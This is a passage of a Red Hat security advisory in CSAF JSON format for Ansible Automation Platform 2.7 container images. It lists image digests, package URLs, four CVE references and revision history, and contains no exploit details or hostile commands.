| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64 | — |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.7",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nFor details about this release, refer to the release notes listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:25928",
"url": "https://access.redhat.com/errata/RHSA-2026:25928"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44188",
"url": "https://access.redhat.com/security/cve/CVE-2026-44188"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44431",
"url": "https://access.redhat.com/security/cve/CVE-2026-44431"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44432",
"url": "https://access.redhat.com/security/cve/CVE-2026-44432"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48526",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7/whats_new-async_updates",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7/whats_new-async_updates"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_25928.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.7 Container Release Update",
"tracking": {
"current_release_date": "2026-06-16T21:44:10+00:00",
"generator": {
"date": "2026-06-16T21:44:10+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.0.0"
}
},
"id": "RHSA-2026:25928",
"initial_release_date": "2026-06-15T08:51:13+00:00",
"revision_history": [
{
"date": "2026-06-15T08:51:13+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-15T08:51:20+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-16T21:44:10+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.7",
"product": {
"name": "Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.7::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3A8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform/platform-operator-bundle\u0026tag=1781122716"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9\u0026tag=1780741250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3A51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9\u0026tag=1780676763"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3A32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform/platform-operator-bundle\u0026tag=1781122716"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9\u0026tag=1781101539"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-devspaces-rhel9@sha256%3Aa6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9\u0026tag=1781112811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3Aa8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9\u0026tag=1780676633"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9\u0026tag=1781042555"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Ad10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9\u0026tag=1781025813"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator\u0026tag=1781012601"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3Ae6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9\u0026tag=1781030318"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/controller-rhel9\u0026tag=1781097765"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator\u0026tag=1781020811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Adfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9\u0026tag=1781028735"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Aa18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator\u0026tag=1780676212"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Afe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9\u0026tag=1781030866"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3Abd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-rhel9\u0026tag=1781044628"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Aeca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator\u0026tag=1781031115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3Ad15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9\u0026tag=1781112272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Acdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-rhel9\u0026tag=1781102816"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator\u0026tag=1780676321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Afb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9\u0026tag=1781105214"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"product": {
